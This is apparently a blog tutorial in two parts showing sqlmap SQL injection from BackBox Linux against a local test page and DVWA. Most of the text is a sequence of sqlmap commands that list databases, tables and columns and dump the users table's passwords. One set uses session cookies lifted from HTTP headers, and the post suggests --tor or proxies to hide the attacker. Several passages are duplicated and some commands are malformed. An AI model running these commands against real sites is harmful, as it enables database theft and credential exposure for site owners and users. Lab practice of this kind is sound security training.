SqlMap - SQL Injection with BackBox
SqlMap
Sql Injection Tool part 1
OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1
Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
Sql Injection Tool part 2
OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/
I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
Sql Injection Tool part 1
OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1
Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
Code:
sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump
SqlMap + Live Http Headers Addon
Sql Injection Tool part 2
OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/
I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :
Code:
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' --dbs
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns
sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump
Comments
Post a Comment